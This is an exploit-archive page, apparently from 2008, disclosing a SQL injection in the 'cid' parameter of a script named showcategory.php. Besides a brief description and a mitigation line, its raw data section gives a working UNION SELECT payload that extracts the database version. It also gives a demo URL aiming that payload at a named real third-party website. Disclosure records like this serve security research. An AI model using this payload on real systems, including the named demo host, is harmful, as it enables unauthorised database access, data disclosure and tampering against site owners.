header-logo
Suggest Exploit
vendor:
N/A
by:
TR-ShaRk
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SQL Injection in showcategory.php

The vulnerability is caused due to the user input passed to the 'cid' parameter in 'showcategory.php' script not being properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the affected application, disclose sensitive information from the database, modify data, etc.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
Source

Exploit-DB raw data:

Author : TR-ShaRk
Web.: Starhack.us Oldkral.Com
email : admin@tr-shark.org
Exploit:

showcategory.php?cid=-101+union+select+1,@@version,3,4,5--

Demo:

http://www.turnkeyzone.com/demos/software/showcategory.php?cid=-101+union+select+1,@@version,3,4,5--

Greetz: Webloader, Realwolker , Batty , Ceypower , Aranelworm , Nefret , JACKAL , Str0ke

Bunu Da KAbul etmesen ,....

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR